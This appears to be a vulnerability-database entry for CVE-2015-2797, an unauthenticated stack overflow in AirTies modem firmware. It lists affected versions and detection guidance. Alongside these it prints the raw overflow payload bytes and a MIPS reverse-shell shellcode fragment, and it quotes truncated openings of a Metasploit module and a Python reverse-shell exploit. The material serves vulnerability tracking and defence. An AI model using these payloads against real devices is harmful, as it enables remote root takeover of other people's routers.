CVE-2015-2797
Published 2015-06-19
Priority P2 · 73 · critical
CVSS 2.0: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
EXPLOIT · EPSS 77.60% (99.5th percentile)
Stack-based buffer overflow in AirTies Air 6372, 5760, 5750, 5650TT, 5453, 5444TT, 5443, 5442, 5343, 5342, 5341, and 5021 DSL modems with firmware 1.0.2.0 and earlier allows remote attackers to execute arbitrary code via a long string in the redirect parameter to cgi-bin/login.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| airties | air_firmware | <= 1.0.2.0 | — |
Detection & IOCs (extracted from sources)
- bytes: `\x41*359 + \x2A\xB1\x19\x18 + \x41*40 + \x2A\xB1\x44\x40 + \x41*12 + \x2A\xB0\xFC\xD4 + \x41*16 + \x2A\xB0\x7A\x2C + \x41*28 + \x2A\xB0\x30\xDC`
- bytes: `\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c`
- Detect HTTP POST requests to /cgi-bin/login with an abnormally long 'redirect' parameter (>359 bytes), which is the overflow offset for the vulnerable AirTies firmware.
- Check HTTP GET requests to /cgi-bin/login; a response body matching /login.html?ErrorCode=2 confirms the vulnerable endpoint is present and reachable.
- The exploit does not require authentication; monitor for POST requests to /cgi-bin/login from unauthenticated sources with large body payloads.
- The MIPS big-endian (MIPSBE) shellcode in the exploit spawns a reverse root shell; look for outbound TCP connections from AirTies devices following a POST to /cgi-bin/login.
- The Metasploit module uses an echo-flavour cmdstager with a linemax of 100 bytes; look for sequences of short echo commands being executed on the device after exploitation.
- The stack overflow offset of 359 bytes before the return address overwrite is confirmed only for the Air5650v3TT FW 1.0.2.0 firmware; other affected models (Air6372, Air5760, Air5750, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021) are reported vulnerable but offsets are unconfirmed.
No detection rules found.
Exploit-DB: Airties - login-cgi Buffer Overflow (Metasploit) · exploitdb · 2015-06-01
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Airties login-cgi Buffer Overflow',
      'Description' => %q{
        This module exploits a remote buffer overflow vulnerability on several Airties routers.
        The vulnerability exists in the handling of HTTP queries to the login cgi with long
        redirect parameters. The vulnerability doesn't require authentication. This module has
        been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
        Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
        Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as v
```
Exploit-DB: Airties Air5650TT - Remote Stack Overflow · exploitdb · 2015-03-31
---
```python
#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: [email protected]
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################
import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib

if __name__ == '__main__':
    try:
        ip = sys.argv[1]        # target modem
        revhost = sys.argv[2]   # host the reverse shell connects back to
        revport = sys.argv[3]   # port the reverse shell connects back to
    except IndexError:
        print "Usage: %s <ip> <revhost> <revport>" % sys.argv[0]
        sys.exit(1)

    # Reverse-shell address encoded as a big-endian 32-bit integer (MIPSBE target)
    host = struct.unpack('>L', socket.inet_aton(revhost))[0]
    port = string.atoi(revport)
    shellcode = ""
    shellcode += "\x24\x0f\xff\xfa
```
Metasploit: Airties login-cgi Buffer Overflow
This module exploits a remote buffer overflow vulnerability on several Airties routers. The vulnerability exists in the handling of HTTP queries to the login cgi with long redirect parameters. The vulnerability doesn't require authentication. This module has been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation. Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
No writeups or analysis indexed.
References
- http://osvdb.org/show/osvdb/120335
- http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/
- http://www.securityfocus.com/bid/75355
- https://www.exploit-db.com/exploits/36577/
- https://www.exploit-db.com/exploits/37170/